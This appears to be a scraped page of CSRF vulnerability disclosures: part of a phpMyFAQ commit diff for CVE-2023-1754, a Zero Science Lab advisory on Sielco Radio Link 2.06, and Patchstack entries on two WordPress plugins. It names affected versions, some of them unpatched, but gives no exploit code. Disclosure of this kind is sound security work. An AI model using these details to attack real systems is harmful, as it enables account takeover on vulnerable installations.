// Import LDAP groups /\* if ('import-ldap-groups' === $groupAction && $user->perm->hasPermission($user->getUserId(), 'addgroup')) { $user = new CurrentUser($faqConfig); $message = ''; $messages = \[\]; // Temporary data $groupName = 'LDAP Group'; $groupDescription = 'This is a LDAP group import demo'; $groupAutoJoin = false; $csrfOkay = true; $csrfToken = Filter::filterInput(INPUT\_POST, 'csrf', FILTER\_UNSAFE\_RAW); if (!isset($\_SESSION\['phpmyfaq\_csrf\_token'\]) || $\_SESSION\['phpmyfaq\_csrf\_token'\] !== $csrfToken) { $csrfOkay = false; } // check group name if ($groupName == '') { $messages\[\] = $PMF\_LANG\['ad\_group\_error\_noName'\]; } // ok, let's go if (count($messages) == 0 && $csrfOkay) { // create group $groupData = \[ 'name' => $groupName, 'description' => $groupDescription, 'auto\_join' => $groupAutoJoin, \]; if ($user->perm->addGroup($groupData) <= 0) { $messages\[\] = $PMF\_LANG\['ad\_adus\_dberr'\]; } } // no errors, show list if (count($messages) == 0) { $groupAction = $defaultGroupAction; $message = sprintf('<p class="alert alert-success">%s</p>', $PMF\_LANG\['ad\_group\_suc'\]); // display error messages and show form again } else { $groupAction = 'import-ldap-groups'; $message = '<p class="alert alert-danger">'; foreach ($messages as $err) { $message .= $err . '<br>'; } $message .= '</p>'; } } \*/  
// show list of users if ('list' === $groupAction) { ?> @@ -416,20 +363,6 @@  
<div class\="col-lg-4" id\="group\_list"\>  
  
<div class\="card mb-4"\> <form id\="group\_select" name\="group\_select" action\="?action=group&amp;group\_action=delete\_confirm" method\="post"\>

CVE-2023-1754: fix: added missing conversion to HTML entities, removed obsolete code · thorsten/phpMyFAQ@d773df9

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Title: Sielco Radio Link 2.06 Cross-Site Request Forgery (Add Admin)  
Advisory ID: ZSL-2023-5761  
Type: Local/Remote  
Impact: Cross-Site Scripting  
Risk: (4/5)  
Release Date: 30.03.2023

**Summary**

Sielco develops and produces radio links for all transmission and reception needs, thanks to innovative units and excellent performances, accompanied by a high reliability and low consumption.

**Description**

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

**Vendor**

Sielco S.r.l - https://www.sielco.org

**Affected Version**

2.06 (RTX19)  
2.05 (RTX19)  
2.00 (EXC19)  
1.60 (RTX19)  
1.59 (RTX19)  
1.55 (EXC19)

**Tested On**

lwIP/2.1.1  
Web/2.9.3

**Vendor Status**

\[26.01.2023\] Vulnerability discovered.  
\[27.01.2023\] Contact with the vendor and CSIRT Italia.  
\[29.03.2023\] No response from the vendor.  
\[29.03.2023\] No response from the CSIRT team.  
\[30.03.2023\] Public security advisory released.

**PoC**

sielco\_rl\_csrf.html

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[30.03.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Sielco Radio Link 2.06 Cross-Site Request Forgery (Add Admin)

Cross-Site Request Forgery (CSRF) vulnerability in German Mesky GMAce plugin <= 1.5.2 versions.

**Solution**

No patched version is available. The vulnerability was reported to the WordPress plugins team on Jan 19, 2023.

Mika discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress GMAce Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has not been known to be fixed yet.

**1 other known vulnerability for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23861: WordPress GMAce plugin <= 1.5.2 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in WP OnlineSupport, Essential Plugin Popup Anything – A Marketing Popup and Lead Generation Conversions plugin <= 2.2.1 versions.

**Solution**

Update the WordPress Popup Anything plugin to the latest available version (at least 2.2.2).

Muhammad Daffa discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Popup Anything Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 2.2.2.

**1 other known vulnerability for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

Tag

#csrf